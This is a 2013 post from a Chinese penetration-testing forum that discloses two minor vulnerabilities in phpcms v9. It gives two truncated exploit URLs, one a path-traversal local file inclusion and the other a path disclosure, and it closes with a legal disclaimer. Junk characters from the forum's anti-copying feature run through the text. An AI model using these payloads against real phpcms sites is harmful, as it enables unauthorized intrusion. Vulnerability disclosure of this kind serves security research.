中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
3 ?% [* [. ?) l+ a" E- v
; a6 s. e% {  Z  X; X& xExp: http://www.php0day.com/api.php?o ... efile=../../../fuck
7 a4 N. P% q1 S! w$ I- _, a: F, I1 I0 k8 l+ p5 c' s
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。" P* w' d) f% l7 ^( c
) x+ _' O0 [( G% Q
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
% w" `+ ~4 i8 F- `
: A' x. e: D% L; n- s#暴路径
; m' a# n5 X  |2 x+ }. f5 B9 c. f; _8 A3 ~% b9 p
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。+ Q# e2 T5 g- w- ]

3 J  N: Z2 {: ^3 ^# |
2 E8 f2 ~" Z+ R6 g6 q9 `7 a
" w, c$ N( C4 O4 Q: a, _+1



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2